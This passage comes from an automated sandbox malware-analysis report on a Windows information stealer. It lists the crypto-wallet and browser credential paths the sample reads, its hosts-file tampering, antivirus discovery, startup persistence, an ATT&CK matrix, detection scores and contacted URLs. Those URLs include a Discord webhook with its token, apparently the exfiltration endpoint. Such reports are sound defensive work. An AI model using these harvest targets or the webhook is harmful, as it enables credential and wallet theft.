              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: powershell.exe, 00000012.00000002.2402540104.000002CB31EB4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2531315049.000002CB4C076000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntiVirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A0F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A0F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: com.liberty.jaxx
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A0F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A0F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 3C:\Users\user\AppData\Roaming\Ethereum\keystore
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A0F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A0F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 1C:\Users\user\AppData\Roaming\Binance\wallets8
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A0F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A0F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 7C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A0F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.logJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: Yara matchFile source: apDMcnqqWs.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.apDMcnqqWs.exe.1ed082d0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000000.2102524227.000001ED082D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2596078793.000001ED0A0F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: apDMcnqqWs.exe PID: 6924, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scr, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              File and Directory Permissions Modification
              1
              OS Credential Dumping
              22
              System Information Discovery
              Remote Services1
              Archive Collected Data
              3
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Command and Scripting Interpreter
              12
              Registry Run Keys / Startup Folder
              11
              Process Injection
              21
              Disable or Modify Tools
              LSASS Memory1
              Query Registry
              Remote Desktop Protocol2
              Data from Local System
              21
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell
              Logon Script (Windows)12
              Registry Run Keys / Startup Folder
              11
              Obfuscated Files or Information
              Security Account Manager131
              Security Software Discovery
              SMB/Windows Admin SharesData from Network Shared Drive4
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Timestomp
              NTDS1
              Process Discovery
              Distributed Component Object ModelInput Capture5
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA Secrets41
              Virtualization/Sandbox Evasion
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
              Masquerading
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
              Virtualization/Sandbox Evasion
              DCSync1
              Remote System Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
              Process Injection
              Proc Filesystem1
              System Network Configuration Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572913 Sample: apDMcnqqWs Startdate: 11/12/2024 Architecture: WINDOWS Score: 100 46 ip-api.com 2->46 48 discord.com 2->48 54 Antivirus detection for dropped file 2->54 56 Antivirus / Scanner detection for submitted sample 2->56 58 Multi AV Scanner detection for dropped file 2->58 60 8 other signatures 2->60 8 apDMcnqqWs.exe 14 16 2->8         started        signatures3 process4 dnsIp5 50 ip-api.com 208.95.112.1, 49720, 80 TUT-ASUS United States 8->50 52 discord.com 162.159.138.232, 443, 49787, 49793 CLOUDFLARENETUS United States 8->52 38 C:\ProgramData\Microsoft\...\4z5ru.scr, PE32 8->38 dropped 40 C:\Windows\System32\drivers\etc\hosts, ASCII 8->40 dropped 42 C:\Users\user\AppData\...\apDMcnqqWs.exe.log, ASCII 8->42 dropped 44 C:\ProgramData\...\4z5ru.scr:Zone.Identifier, ASCII 8->44 dropped 62 Suspicious powershell command line found 8->62 64 Found many strings related to Crypto-Wallets (likely being stolen) 8->64 66 Drops PE files with a suspicious file extension 8->66 68 5 other signatures 8->68 13 powershell.exe 23 8->13         started        16 powershell.exe 7 8->16         started        18 WMIC.exe 1 8->18         started        20 6 other processes 8->20 file6 signatures7 process8 signatures9 70 Loading BitLocker PowerShell Module 13->70 22 WmiPrvSE.exe 13->22         started        24 conhost.exe 13->24         started        26 conhost.exe 16->26         started        28 conhost.exe 18->28         started        30 conhost.exe 20->30         started        32 conhost.exe 20->32         started        34 conhost.exe 20->34         started        36 2 other processes 20->36 process10

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              apDMcnqqWs.exe88%ReversingLabsByteCode-MSIL.Trojan.Zilla
              apDMcnqqWs.exe79%VirustotalBrowse
              apDMcnqqWs.exe100%AviraHEUR/AGEN.1307507
              apDMcnqqWs.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scr100%AviraHEUR/AGEN.1307507
              C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scr100%Joe Sandbox ML
              C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scr88%ReversingLabsByteCode-MSIL.Trojan.Zilla
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://crl.micft.cMicRosof0%Avira URL Cloudsafe
              http://crl.mic0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              discord.com
              162.159.138.232
              truefalse
                high
                ip-api.com
                208.95.112.1
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  http://ip-api.com/json/?fields=225545false
                    high
                    https://discord.com/api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8TsaDB_AZHbN51MWJHNb9obGfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://mail.google.com/mail/?usp=installed_webappapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://mail.google.com/mail/installwebapp?usp=chrome_defaultapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://docs.google.com/presentation/JapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000002.00000002.2197486995.000002017538F000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://docs.google.com/document/JapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://drive.google.com/drive/installwebapp?usp=chrome_defaultapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://contoso.com/Licensepowershell.exe, 00000012.00000002.2408109229.000002CB3544E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://discordapp.com/api/v9/users/apDMcnqqWs.exe, 4z5ru.scr.0.drfalse
                                      high
                                      https://www.youtube.com/:apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://discord.comapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A348000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A322000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://mail.google.com/mail/:apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://docs.google.com/presentation/installwebapp?usp=chromapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://docs.google.com/document/installwebapp?usp=chrome_defaultapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://docs.google.com/presentation/:apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://docs.google.com/presentation/installwebapp?usp=chrome_defaultapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://docs.google.com/document/:apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://docs.google.com/spreadsheets/JapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://docs.google.com/spreadsheets/?usp=installed_webappapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://mail.google.com/mail/JapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://contoso.com/powershell.exe, 00000012.00000002.2408109229.000002CB3544E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2189157435.0000020110072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2368673282.00000215E2CAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2368673282.00000215E2DE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301853411.00000215D45E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2514196994.000002CB43C43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2514196994.000002CB43B00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2408109229.000002CB3544E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://docs.google.com/spreadsheets/:apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://drive.google.com/?lfhs=2apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://ip-api.comapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A27F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://github.com/PyDevOG/Divulge-Stealer4z5ru.scr.0.drfalse
                                                                        high
                                                                        https://oneget.orgXpowershell.exe, 0000000E.00000002.2301853411.00000215D409F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://crl.micft.cMicRosofpowershell.exe, 00000002.00000002.2197486995.00000201753AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.youtube.com/s/notifications/manifest/cr_install.htmlapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2168075363.0000020100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2216206407.000001E38DA98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301853411.00000215D2C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2408109229.000002CB33A91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.youtube.com/?feature=ytcaapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-apDMcnqqWs.exe, 4z5ru.scr.0.drfalse
                                                                                  high
                                                                                  https://www.youtube.com/JapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2189157435.0000020110072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2368673282.00000215E2CAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2368673282.00000215E2DE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301853411.00000215D45E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2514196994.000002CB43C43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2514196994.000002CB43B00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2408109229.000002CB3544E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
